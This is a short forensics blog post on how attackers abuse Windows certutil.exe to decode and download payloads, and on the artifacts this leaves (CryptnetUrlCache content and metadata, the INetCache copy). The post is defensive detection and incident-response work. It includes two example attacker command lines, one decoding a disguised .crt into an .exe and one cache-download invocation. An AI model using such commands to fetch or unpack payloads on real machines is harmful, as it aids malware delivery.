Wednesday, 13 March 2019

[Initial Access & execution] - Evidences for files download using Certutil.exe utility

Cetutil is a Microsoft native utility that can be used to dump and display certification authority (CA) configuration information, configure certificate services, back up and restore CA components, verify certificates, key pairs or certificate chains.  

It comes with several command options, among which some of them can be (ab)used to decode a b64/hex encoded malicious file and/or to download a payload/script:

  • Decoding example: certutil -decode %TEMP%\\Signature.crt %TEMP%\\Sign.exe
  • Download example: certutil -urlcache -split -f %APPDATA%\Softupdate.txt 
To investigate any potential behavioral indicators to detect the download operation, we will download a file from the internet and monitor files and registry changes using procmon.exe:

As can be seen below, no relevant registry changes:

Surprisingly, FileWrite operations reveal good forensics artifacts:

As can be seen above, we have multiple write operations:
  1. Location specified in the certutil.exe command as a destination for the downloaded file.
  2. C:\Users\username\AppData\Local\Microsoft\Windows\INetCache\IE\<Random>\
  3. C:\Users\username\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\random_file_name
  4. C:\Users\username\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\random_file_name
Verifying the content of the written files in 2 and 4 reveals that hey are just copies of the downloaded file (stored in 1) --> Good for IR and Forensics (copy of dropped file 👍):

Last observed useful artifact is the used download URL (found in file #3 "CryptnetUrlCache\Metadata"):

  • Same tests conducted on Windows 10 were replicated on Windows 7, same artifacts with the exception of the copy written to INETCACHE folder (see bullet #2)
  • Renaming certutil.exe and running it from %temp% left same artifacts
  • Microsoft\CryptnetUrlCache\Content & METADATA are not highly solicited folders, see below creation times on one machine that keeps content from 2017 until present (which is good for forensics and hunting previous infections using this technique):


No comments:

Post a Comment